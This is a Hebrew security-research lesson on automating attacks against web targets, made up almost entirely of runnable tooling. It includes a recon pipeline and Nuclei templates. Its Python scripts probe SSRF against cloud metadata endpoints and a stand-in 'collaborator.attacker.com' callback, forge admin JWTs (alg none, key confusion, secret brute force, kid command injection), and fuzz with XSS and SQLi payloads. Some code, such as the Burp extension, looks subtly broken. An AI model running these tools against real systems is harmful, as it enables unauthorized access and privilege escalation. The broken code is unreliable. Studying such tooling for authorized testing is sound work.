אוטומציה של תקיפות - Attack Automation¶
מבוא¶
אוטומציה היא המפתח ליעילות במחקר אבטחה. חוקר שיודע לאטמט את תהליכי הסריקה, הזיהוי והניצול יכול לכסות שטח תקיפה גדול בהרבה מחוקר שעובד ידנית. בשיעור זה נבנה כלים אוטומטיים מקצועיים.
בניית צינור סריקה - Recon Pipeline¶
הרעיון¶
צינור סריקה מחבר מספר כלים בשרשרת אוטומטית:
Subdomain Enumeration → Alive Check → Port Scanning →
Technology Detection → Content Discovery → Vulnerability Scanning
סקריפט צינור סריקה מלא¶
#!/bin/bash
# recon.sh - צינור סריקה אוטומטי
# שימוש: ./recon.sh target.com
TARGET=$1
OUTDIR="./recon/$TARGET/$(date +%Y%m%d)"
mkdir -p "$OUTDIR"
echo "[*] מתחיל סריקה של $TARGET"
echo "[*] תוצאות נשמרות ב: $OUTDIR"
# ============================
# שלב 1: סריקת תת-דומיינים
# ============================
echo "[1/6] סריקת תת-דומיינים..."
# subfinder
subfinder -d "$TARGET" -silent -o "$OUTDIR/subfinder.txt" 2>/dev/null
# amass (מצב פסיבי)
amass enum -passive -d "$TARGET" -o "$OUTDIR/amass.txt" 2>/dev/null
# assetfinder
assetfinder --subs-only "$TARGET" > "$OUTDIR/assetfinder.txt" 2>/dev/null
# חיפוש ב-crt.sh
curl -s "https://crt.sh/?q=%25.$TARGET&output=json" | \
jq -r '.[].name_value' | sort -u > "$OUTDIR/crtsh.txt" 2>/dev/null
# איחוד כל התוצאות
cat "$OUTDIR"/subfinder.txt "$OUTDIR"/amass.txt \
"$OUTDIR"/assetfinder.txt "$OUTDIR"/crtsh.txt 2>/dev/null | \
sort -u > "$OUTDIR/all_subdomains.txt"
TOTAL_SUBS=$(wc -l < "$OUTDIR/all_subdomains.txt")
echo " נמצאו $TOTAL_SUBS תת-דומיינים ייחודיים"
# ============================
# שלב 2: בדיקת זמינות
# ============================
echo "[2/6] בדיקת זמינות..."
httpx -l "$OUTDIR/all_subdomains.txt" -silent \
-status-code -title -tech-detect \
-o "$OUTDIR/alive.txt" 2>/dev/null
ALIVE=$(wc -l < "$OUTDIR/alive.txt")
echo " $ALIVE תת-דומיינים חיים"
# חילוץ URLs בלבד
cat "$OUTDIR/alive.txt" | awk '{print $1}' > "$OUTDIR/alive_urls.txt"
# ============================
# שלב 3: סריקת פורטים
# ============================
echo "[3/6] סריקת פורטים..."
# סריקה מהירה של פורטים נפוצים
cat "$OUTDIR/all_subdomains.txt" | \
naabu -p 80,443,8080,8443,8000,8888,3000,5000,9090,9200 \
-silent -o "$OUTDIR/ports.txt" 2>/dev/null
echo " סריקת פורטים הושלמה"
# ============================
# שלב 4: זיהוי טכנולוגיות
# ============================
echo "[4/6] זיהוי טכנולוגיות..."
# שימוש ב-httpx עם זיהוי טכנולוגיות
httpx -l "$OUTDIR/alive_urls.txt" -silent \
-tech-detect -json -o "$OUTDIR/tech.json" 2>/dev/null
echo " זיהוי טכנולוגיות הושלם"
# ============================
# שלב 5: גילוי תוכן
# ============================
echo "[5/6] גילוי תוכן..."
while IFS= read -r url; do
domain=$(echo "$url" | sed 's|https\?://||' | sed 's|/.*||')
mkdir -p "$OUTDIR/content/$domain"
# גילוי נתיבים
ffuf -u "${url}/FUZZ" \
-w /usr/share/wordlists/dirb/common.txt \
-mc 200,301,302,403 \
-o "$OUTDIR/content/$domain/dirs.json" \
-of json -s 2>/dev/null
# גילוי קבצי JavaScript
echo "$url" | gau --subs 2>/dev/null | \
grep -iE '\.js$' | sort -u > "$OUTDIR/content/$domain/js_files.txt"
done < "$OUTDIR/alive_urls.txt"
echo " גילוי תוכן הושלם"
# ============================
# שלב 6: סריקת חולשות
# ============================
echo "[6/6] סריקת חולשות..."
nuclei -l "$OUTDIR/alive_urls.txt" \
-severity critical,high,medium \
-o "$OUTDIR/nuclei_results.txt" \
-silent 2>/dev/null
echo " סריקת חולשות הושלמה"
# ============================
# דוח סיכום
# ============================
echo ""
echo "================================"
echo " דוח סיכום - $TARGET"
echo "================================"
echo "תת-דומיינים: $TOTAL_SUBS"
echo "חיים: $ALIVE"
echo "פורטים פתוחים: $(wc -l < "$OUTDIR/ports.txt" 2>/dev/null || echo 0)"
echo "ממצאי Nuclei: $(wc -l < "$OUTDIR/nuclei_results.txt" 2>/dev/null || echo 0)"
echo "תוצאות: $OUTDIR"
כתיבת תבניות Nuclei¶
מבנה תבנית בסיסי¶
id: custom-admin-panel-detect
info:
name: Admin Panel Detection
author: researcher
severity: info
description: זיהוי פאנלי ניהול חשופים
tags: admin,panel,detection
requests:
- method: GET
path:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/admin/login"
- "{{BaseURL}}/administrator"
- "{{BaseURL}}/wp-admin"
- "{{BaseURL}}/cp"
- "{{BaseURL}}/dashboard"
matchers-condition: or
matchers:
- type: word
words:
- "admin"
- "login"
- "dashboard"
condition: and
part: body
- type: status
status:
- 200
- 302
תבנית לזיהוי SSRF¶
id: ssrf-detection
info:
name: SSRF Detection via OOB
author: researcher
severity: high
description: זיהוי SSRF דרך callback חיצוני
tags: ssrf,oob
requests:
- method: POST
path:
- "{{BaseURL}}/api/fetch"
- "{{BaseURL}}/api/proxy"
- "{{BaseURL}}/api/url-preview"
- "{{BaseURL}}/api/webhook"
headers:
Content-Type: application/json
body: |
{"url": "http://{{interactsh-url}}"}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
- method: GET
path:
- "{{BaseURL}}/redirect?url=http://{{interactsh-url}}"
- "{{BaseURL}}/fetch?url=http://{{interactsh-url}}"
- "{{BaseURL}}/proxy?url=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
תבנית לזיהוי JWT חלש¶
id: jwt-weak-secret
info:
name: JWT Weak Secret Detection
author: researcher
severity: high
description: זיהוי JWT עם סודות חלשים
tags: jwt,authentication
requests:
- method: GET
path:
- "{{BaseURL}}/api/me"
- "{{BaseURL}}/api/user"
- "{{BaseURL}}/api/profile"
headers:
Authorization: "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "user"
- "email"
- "name"
condition: or
part: body
extractors:
- type: json
json:
- '.email'
- '.name'
- '.role'
תבנית Workflow - בדיקה מרובת שלבים¶
id: oauth-misconfiguration-workflow
info:
name: OAuth Misconfiguration Chain
author: researcher
severity: high
description: בדיקה מרובת שלבים של הגדרות OAuth
tags: oauth,workflow
workflows:
- template: detect-oauth-endpoint.yaml
subtemplates:
- template: check-redirect-uri-validation.yaml
subtemplates:
- template: steal-oauth-token.yaml
הרחבות Burp Suite בפייתון¶
הרחבת סורק פסיבי - Montoya API¶
# passive_scanner.py - הרחבה שמזהה מידע רגיש בתגובות
from burp.api.montoya import MontoyaApi
from burp.api.montoya.scanner import (
AuditResult, AuditIssue, ScanCheck, ConsolidationAction
)
import re
class SensitiveDataScanner(ScanCheck):
PATTERNS = {
'AWS Access Key': r'AKIA[0-9A-Z]{16}',
'AWS Secret Key': r'[0-9a-zA-Z/+]{40}',
'GitHub Token': r'gh[ps]_[A-Za-z0-9_]{36}',
'Slack Token': r'xox[baprs]-[0-9a-zA-Z-]+',
'JWT Token': r'eyJ[A-Za-z0-9-_]+\.eyJ[A-Za-z0-9-_]+\.[A-Za-z0-9-_.+/=]*',
'Private Key': r'-----BEGIN (RSA |EC )?PRIVATE KEY-----',
'API Key Pattern': r'(?i)(api[_-]?key|apikey|api_secret)["\s:=]+["\']?[\w-]{20,}',
'Internal IP': r'\b(?:10|172\.(?:1[6-9]|2\d|3[01])|192\.168)\.\d{1,3}\.\d{1,3}\b',
'Email Address': r'[\w.-]+@[\w.-]+\.\w+',
}
def __init__(self, api: MontoyaApi):
self.api = api
def activeAudit(self, baseRequestResponse):
return AuditResult.auditResult([])
def passiveAudit(self, baseRequestResponse):
issues = []
response = baseRequestResponse.response()
if response is None:
return AuditResult.auditResult([])
body = response.bodyToString()
for name, pattern in self.PATTERNS.items():
matches = re.findall(pattern, body)
if matches:
issue = AuditIssue.auditIssue(
f"Sensitive Data Exposure: {name}",
f"Found {len(matches)} instance(s) of {name} in response body. "
f"Sample: {matches[0][:50]}...",
None,
baseRequestResponse.request().url(),
AuditIssueSeverity.MEDIUM,
AuditIssueConfidence.CERTAIN,
None,
None,
AuditIssueSeverity.MEDIUM,
baseRequestResponse
)
issues.append(issue)
return AuditResult.auditResult(issues)
def consolidateIssues(self, newIssue, existingIssue):
if newIssue.name() == existingIssue.name():
return ConsolidationAction.KEEP_EXISTING
return ConsolidationAction.KEEP_BOTH
# נקודת כניסה
def initialize(api: MontoyaApi):
api.scanner().registerScanCheck(SensitiveDataScanner(api))
api.logging().logToOutput("Sensitive Data Scanner loaded!")
סקריפטי אוטומציה בפייתון¶
סקריפט בדיקת SSRF אוטומטי¶
#!/usr/bin/env python3
"""
ssrf_tester.py - בדיקת SSRF אוטומטית
"""
import requests
import urllib.parse
import time
import sys
from concurrent.futures import ThreadPoolExecutor
class SSRFTester:
def __init__(self, callback_server):
self.callback = callback_server
self.session = requests.Session()
self.results = []
# פיילודים ל-SSRF
self.payloads = [
# ישיר
f"http://{callback_server}/ssrf",
# כתובת metadata
"http://169.254.169.254/latest/meta-data/",
"http://metadata.google.internal/computeMetadata/v1/",
# עקיפת סינון
"http://0x7f000001/",
"http://2130706433/",
"http://017700000001/",
"http://[::1]/",
f"http://0177.0.0.1/",
# DNS rebinding
f"http://127.0.0.1.nip.io/",
# עם redirect
f"http://{callback_server}/redirect?to=http://169.254.169.254/",
# Gopher protocol
"gopher://127.0.0.1:6379/_INFO",
]
# פרמטרים נפוצים שעלולים להיות פגיעים
self.params = [
'url', 'uri', 'path', 'dest', 'redirect', 'redirect_uri',
'callback', 'return', 'page', 'feed', 'host', 'site',
'html', 'data', 'reference', 'ref', 'fetch', 'proxy',
'link', 'src', 'source', 'target', 'domain', 'load',
]
def test_endpoint(self, base_url, param, payload):
"""בדיקת נקודת קצה ספציפית"""
try:
# GET
url = f"{base_url}?{param}={urllib.parse.quote(payload)}"
response = self.session.get(url, timeout=10, allow_redirects=False)
result = {
'url': base_url,
'param': param,
'payload': payload,
'method': 'GET',
'status': response.status_code,
'length': len(response.text),
}
# בדיקת סימנים ל-SSRF
if self.check_indicators(response):
result['vulnerable'] = True
self.results.append(result)
print(f"[!] SSRF פוטנציאלי: {url}")
return result
# POST JSON
response = self.session.post(
base_url,
json={param: payload},
timeout=10,
allow_redirects=False
)
result['method'] = 'POST'
result['status'] = response.status_code
if self.check_indicators(response):
result['vulnerable'] = True
self.results.append(result)
print(f"[!] SSRF פוטנציאלי (POST): {base_url}")
return result
except requests.exceptions.Timeout:
# Timeout יכול להיות סימן ל-SSRF blind
return {'url': base_url, 'param': param, 'timeout': True}
except Exception as e:
return None
def check_indicators(self, response):
"""בדיקת סימנים שמעידים על SSRF"""
indicators = [
'ami-id', 'instance-id', # AWS metadata
'computeMetadata', # GCP metadata
'metadata/instance', # Azure metadata
'REDIS', '+OK', '+PONG', # Redis
'root:x:0:0', # /etc/passwd
]
for indicator in indicators:
if indicator in response.text:
return True
return False
def scan(self, endpoints):
"""סריקת רשימת נקודות קצה"""
tasks = []
for endpoint in endpoints:
for param in self.params:
for payload in self.payloads:
tasks.append((endpoint, param, payload))
with ThreadPoolExecutor(max_workers=10) as executor:
futures = [
executor.submit(self.test_endpoint, *task)
for task in tasks
]
print(f"\n[+] סריקה הושלמה. נמצאו {len(self.results)} ממצאים")
return self.results
if __name__ == '__main__':
tester = SSRFTester("collaborator.attacker.com")
endpoints = [
"https://target.com/api/fetch",
"https://target.com/api/proxy",
"https://target.com/api/preview",
]
results = tester.scan(endpoints)
סקריפט תקיפת JWT אוטומטי¶
#!/usr/bin/env python3
"""
jwt_attacker.py - בדיקות אוטומטיות על JWT
"""
import jwt
import json
import base64
import requests
import hmac
import hashlib
from datetime import datetime, timedelta
class JWTAttacker:
def __init__(self, target_url, token):
self.target_url = target_url
self.original_token = token
self.header, self.payload, self.signature = self.decode_token(token)
def decode_token(self, token):
"""פענוח JWT ללא אימות חתימה"""
parts = token.split('.')
header = json.loads(self.b64_decode(parts[0]))
payload = json.loads(self.b64_decode(parts[1]))
signature = parts[2]
return header, payload, signature
def b64_decode(self, data):
"""פענוח Base64URL"""
padding = 4 - len(data) % 4
data += '=' * padding
return base64.urlsafe_b64decode(data)
def b64_encode(self, data):
"""קידוד Base64URL"""
return base64.urlsafe_b64encode(data).rstrip(b'=').decode()
def test_none_algorithm(self):
"""בדיקה 1: Algorithm None"""
print("[*] בדיקת Algorithm None...")
for alg in ['none', 'None', 'NONE', 'nOnE']:
header = {'alg': alg, 'typ': 'JWT'}
payload = self.payload.copy()
payload['role'] = 'admin'
token = (
self.b64_encode(json.dumps(header).encode()) + '.' +
self.b64_encode(json.dumps(payload).encode()) + '.'
)
if self.test_token(token):
print(f"[+] Algorithm None עובד! alg={alg}")
return token
print("[-] Algorithm None לא עובד")
return None
def test_algorithm_confusion(self, public_key_pem):
"""בדיקה 2: Algorithm Confusion (RS256 -> HS256)"""
print("[*] בדיקת Algorithm Confusion...")
header = {'alg': 'HS256', 'typ': 'JWT'}
payload = self.payload.copy()
payload['role'] = 'admin'
header_b64 = self.b64_encode(json.dumps(header).encode())
payload_b64 = self.b64_encode(json.dumps(payload).encode())
signing_input = f"{header_b64}.{payload_b64}"
# חתימה עם המפתח הציבורי כסוד ל-HMAC
signature = hmac.new(
public_key_pem.encode(),
signing_input.encode(),
hashlib.sha256
).digest()
token = f"{signing_input}.{self.b64_encode(signature)}"
if self.test_token(token):
print("[+] Algorithm Confusion עובד!")
return token
print("[-] Algorithm Confusion לא עובד")
return None
def test_weak_secrets(self):
"""בדיקה 3: סודות חלשים"""
print("[*] בדיקת סודות חלשים...")
secrets = [
'secret', 'password', '123456', 'key', 'jwt_secret',
'your-256-bit-secret', 'changeme', 'admin', 'test',
'supersecret', 'jwt', 'token', 'mysecret', 'default',
'', 'null', 'undefined', 'SECRET_KEY',
]
# קריאה מקובץ אם קיים
try:
with open('jwt_secrets.txt') as f:
secrets.extend(f.read().splitlines())
except FileNotFoundError:
pass
for secret in secrets:
try:
payload = self.payload.copy()
payload['role'] = 'admin'
payload['exp'] = int((
datetime.utcnow() + timedelta(days=30)
).timestamp())
token = jwt.encode(payload, secret, algorithm='HS256')
if self.test_token(token):
print(f"[+] סוד נמצא: '{secret}'")
return secret, token
except Exception:
continue
print("[-] סוד חלש לא נמצא")
return None, None
def test_kid_injection(self):
"""בדיקה 4: KID Header Injection"""
print("[*] בדיקת KID Injection...")
injections = [
# SQL Injection ב-kid
("' UNION SELECT 'secret' -- ", 'secret'),
# Path Traversal ב-kid
("../../dev/null", ''),
("../../../dev/null", ''),
# Command Injection
("| cat /etc/passwd", ''),
]
for kid, secret in injections:
header = {
'alg': 'HS256',
'typ': 'JWT',
'kid': kid
}
payload = self.payload.copy()
payload['role'] = 'admin'
try:
token = jwt.encode(
payload, secret,
algorithm='HS256',
headers=header
)
if self.test_token(token):
print(f"[+] KID Injection עובד! kid='{kid}'")
return token
except Exception:
continue
print("[-] KID Injection לא עובד")
return None
def test_claim_tampering(self):
"""בדיקה 5: שינוי claims"""
print("[*] בדיקת שינוי Claims...")
modifications = [
{'role': 'admin'},
{'admin': True},
{'is_admin': True},
{'user_type': 'admin'},
{'sub': '1'}, # ID של אדמין
{'group': 'administrators'},
]
for mod in modifications:
payload = self.payload.copy()
payload.update(mod)
# ניסיון ללא שינוי החתימה (בדיקה אם החתימה נבדקת)
header_b64 = self.b64_encode(json.dumps(self.header).encode())
payload_b64 = self.b64_encode(json.dumps(payload).encode())
token = f"{header_b64}.{payload_b64}.{self.signature}"
if self.test_token(token):
print(f"[+] שינוי Claims עובד! {mod}")
return token
print("[-] שינוי Claims לא עובד")
return None
def test_token(self, token):
"""בדיקת טוקן מול השרת"""
try:
response = requests.get(
self.target_url,
headers={'Authorization': f'Bearer {token}'},
timeout=5
)
if response.status_code == 200:
data = response.json()
if data.get('role') == 'admin' or data.get('is_admin'):
return True
except Exception:
pass
return False
def run_all_tests(self, public_key=None):
"""הרצת כל הבדיקות"""
print(f"[*] מתחיל בדיקת JWT")
print(f"[*] כותרת: {json.dumps(self.header)}")
print(f"[*] מטען: {json.dumps(self.payload)}")
print()
# בדיקה 1
result = self.test_none_algorithm()
if result:
return result
# בדיקה 2
if public_key:
result = self.test_algorithm_confusion(public_key)
if result:
return result
# בדיקה 3
secret, result = self.test_weak_secrets()
if result:
return result
# בדיקה 4
result = self.test_kid_injection()
if result:
return result
# בדיקה 5
result = self.test_claim_tampering()
if result:
return result
print("\n[-] לא נמצאו חולשות JWT")
return None
if __name__ == '__main__':
attacker = JWTAttacker(
target_url='https://target.com/api/me',
token='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...'
)
attacker.run_all_tests()
סקריפט Fuzzing פרמטרים עם aiohttp¶
#!/usr/bin/env python3
"""
param_fuzzer.py - סקריפט Fuzzing אסינכרוני
"""
import aiohttp
import asyncio
import sys
from urllib.parse import urlencode
import json
class ParamFuzzer:
def __init__(self, target_url, wordlist_path, concurrency=50):
self.target_url = target_url
self.concurrency = concurrency
self.results = []
self.semaphore = asyncio.Semaphore(concurrency)
with open(wordlist_path) as f:
self.params = f.read().splitlines()
async def fuzz_param(self, session, param, value):
"""בדיקת פרמטר בודד"""
async with self.semaphore:
try:
# GET
url = f"{self.target_url}?{param}={value}"
async with session.get(url, timeout=aiohttp.ClientTimeout(total=10)) as response:
body = await response.text()
result = {
'param': param,
'value': value,
'status': response.status,
'length': len(body),
'reflected': value in body,
}
if result['reflected']:
print(f"[+] ערך משתקף: {param}={value} "
f"(status={response.status}, len={len(body)})")
self.results.append(result)
return result
except asyncio.TimeoutError:
return {'param': param, 'timeout': True}
except Exception as e:
return {'param': param, 'error': str(e)}
async def discover_params(self, session):
"""גילוי פרמטרים נסתרים"""
print(f"[*] בודק {len(self.params)} פרמטרים...")
baseline_response = None
async with session.get(self.target_url) as response:
baseline_response = {
'status': response.status,
'length': len(await response.text())
}
tasks = []
for param in self.params:
task = self.fuzz_param(session, param, 'fuzzing123')
tasks.append(task)
results = await asyncio.gather(*tasks)
# סינון פרמטרים שגרמו לשינוי בתגובה
interesting = []
for result in results:
if result and not result.get('error') and not result.get('timeout'):
if (result['status'] != baseline_response['status'] or
abs(result['length'] - baseline_response['length']) > 50):
interesting.append(result)
return interesting
async def test_xss(self, session, params):
"""בדיקת XSS על פרמטרים שמשתקפים"""
print(f"\n[*] בדיקת XSS על {len(params)} פרמטרים...")
xss_payloads = [
'<script>alert(1)</script>',
'"><img src=x onerror=alert(1)>',
"'-alert(1)-'",
'{{7*7}}',
'${7*7}',
]
for param_result in params:
if param_result.get('reflected'):
for payload in xss_payloads:
result = await self.fuzz_param(
session, param_result['param'], payload
)
if result and result.get('reflected'):
print(f"[!] XSS פוטנציאלי: "
f"{param_result['param']}={payload}")
async def test_sqli(self, session, params):
"""בדיקת SQLi על פרמטרים"""
print(f"\n[*] בדיקת SQLi על {len(params)} פרמטרים...")
sqli_payloads = [
"' OR 1=1--",
"1' AND '1'='1",
"1 AND 1=1",
"' UNION SELECT NULL--",
"1; WAITFOR DELAY '0:0:5'--",
]
for param_result in params:
for payload in sqli_payloads:
result = await self.fuzz_param(
session, param_result['param'], payload
)
if result and result.get('status') == 500:
print(f"[!] SQLi פוטנציאלי: "
f"{param_result['param']}={payload}")
async def run(self):
"""הרצת כל הבדיקות"""
async with aiohttp.ClientSession() as session:
# גילוי פרמטרים
interesting = await self.discover_params(session)
print(f"\n[+] נמצאו {len(interesting)} פרמטרים מעניינים")
reflected = [r for r in interesting if r.get('reflected')]
print(f"[+] {len(reflected)} פרמטרים משתקפים")
# בדיקת XSS
await self.test_xss(session, reflected)
# בדיקת SQLi
await self.test_sqli(session, interesting)
if __name__ == '__main__':
fuzzer = ParamFuzzer(
target_url='https://target.com/page',
wordlist_path='params.txt',
concurrency=30
)
asyncio.run(fuzzer.run())
אוטומציה עם דפדפן Headless¶
בדיקת XSS אוטומטית עם Playwright¶
#!/usr/bin/env python3
"""
xss_verifier.py - אימות XSS אוטומטי עם Playwright
"""
import asyncio
from playwright.async_api import async_playwright
import json
class XSSVerifier:
def __init__(self):
self.confirmed = []
self.payloads = [
'<img src=x onerror=window.__xss_triggered=true>',
'<svg onload=window.__xss_triggered=true>',
'"><img src=x onerror=window.__xss_triggered=true>',
"'-window.__xss_triggered=true-'",
'<details open ontoggle=window.__xss_triggered=true>',
]
async def verify_xss(self, url, param, payload):
"""אימות XSS בודד"""
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
context = await browser.new_context()
page = await context.new_page()
# הגדרת flag לזיהוי XSS
await page.evaluate('window.__xss_triggered = false')
# מעקב אחרי dialog (alert/confirm/prompt)
dialog_triggered = False
async def handle_dialog(dialog):
nonlocal dialog_triggered
dialog_triggered = True
await dialog.dismiss()
page.on('dialog', handle_dialog)
try:
test_url = f"{url}?{param}={payload}"
await page.goto(test_url, wait_until='networkidle', timeout=10000)
# בדיקה אם ה-XSS הופעל
xss_flag = await page.evaluate('window.__xss_triggered')
if xss_flag or dialog_triggered:
# צילום מסך כהוכחה
screenshot_path = f"xss_proof_{param}_{len(self.confirmed)}.png"
await page.screenshot(path=screenshot_path)
result = {
'url': test_url,
'param': param,
'payload': payload,
'screenshot': screenshot_path,
'dialog': dialog_triggered,
'flag': xss_flag,
}
self.confirmed.append(result)
print(f"[+] XSS מאושר! {param}={payload}")
print(f" צילום מסך: {screenshot_path}")
return result
except Exception as e:
pass
finally:
await browser.close()
return None
async def scan(self, target_url, params):
"""סריקת כל הפרמטרים"""
print(f"[*] בדיקת {len(params)} פרמטרים עם {len(self.payloads)} payloads")
for param in params:
for payload in self.payloads:
await self.verify_xss(target_url, param, payload)
print(f"\n[+] סיום. {len(self.confirmed)} XSS מאושרים")
return self.confirmed
async def capture_dom_xss(self, url):
"""זיהוי DOM XSS"""
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
page = await browser.new_page()
# מעקב אחרי sinks מסוכנים
await page.add_init_script("""
const originalInnerHTML = Object.getOwnPropertyDescriptor(
Element.prototype, 'innerHTML'
);
Object.defineProperty(Element.prototype, 'innerHTML', {
set: function(value) {
if (value.includes('<script') || value.includes('onerror')) {
window.__dom_xss_sinks = window.__dom_xss_sinks || [];
window.__dom_xss_sinks.push({
sink: 'innerHTML',
element: this.tagName,
value: value.substring(0, 200)
});
}
return originalInnerHTML.set.call(this, value);
},
get: function() {
return originalInnerHTML.get.call(this);
}
});
""")
await page.goto(url, wait_until='networkidle', timeout=15000)
sinks = await page.evaluate('window.__dom_xss_sinks || []')
await browser.close()
if sinks:
print(f"[!] זוהו DOM XSS sinks:")
for sink in sinks:
print(f" {sink['sink']} על {sink['element']}: "
f"{sink['value'][:100]}")
return sinks
if __name__ == '__main__':
verifier = XSSVerifier()
asyncio.run(verifier.scan(
'https://target.com/search',
['q', 'query', 'search', 'keyword']
))
אינטגרציית אבטחה ב-CI/CD¶
GitHub Actions - סריקת אבטחה אוטומטית¶
# .github/workflows/security-scan.yml
name: Security Scan
on:
schedule:
- cron: '0 6 * * 1' # כל יום שני בשש בבוקר
workflow_dispatch: # הרצה ידנית
jobs:
recon:
runs-on: ubuntu-latest
steps:
- name: Install tools
run: |
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
- name: Subdomain enumeration
run: subfinder -d ${{ secrets.TARGET_DOMAIN }} -o subdomains.txt
- name: Check alive hosts
run: httpx -l subdomains.txt -silent -o alive.txt
- name: Vulnerability scan
run: |
nuclei -l alive.txt -severity critical,high \
-o findings.txt -silent
- name: Notify on findings
if: ${{ hashFiles('findings.txt') != '' }}
run: |
curl -X POST ${{ secrets.SLACK_WEBHOOK }} \
-H 'Content-Type: application/json' \
-d "{\"text\": \"Security findings detected: $(cat findings.txt | wc -l) issues\"}"
- name: Upload results
uses: actions/upload-artifact@v3
with:
name: security-results
path: |
subdomains.txt
alive.txt
findings.txt
סיכום¶
כלי / טכניקה שימוש רמת מורכבות
=====================================================================
Bash recon pipeline סריקה ראשונית מקיפה בינונית
Nuclei templates סריקת חולשות מותאמת בינונית
Burp extensions ניטור פסיבי אוטומטי גבוהה
Python SSRF tester בדיקת SSRF ממוקדת בינונית
JWT attacker בדיקות JWT שיטתיות בינונית
Param fuzzer גילוי פרמטרים וחולשות בינונית
Playwright XSS אימות XSS אוטומטי גבוהה
CI/CD integration סריקה מתוזמנת בינונית
המפתח הוא לבנות כלים שמתאימים לצרכים שלכם ולשפר אותם לאורך זמן. כל חוקר צריך ארגז כלים אישי שמתפתח עם הניסיון.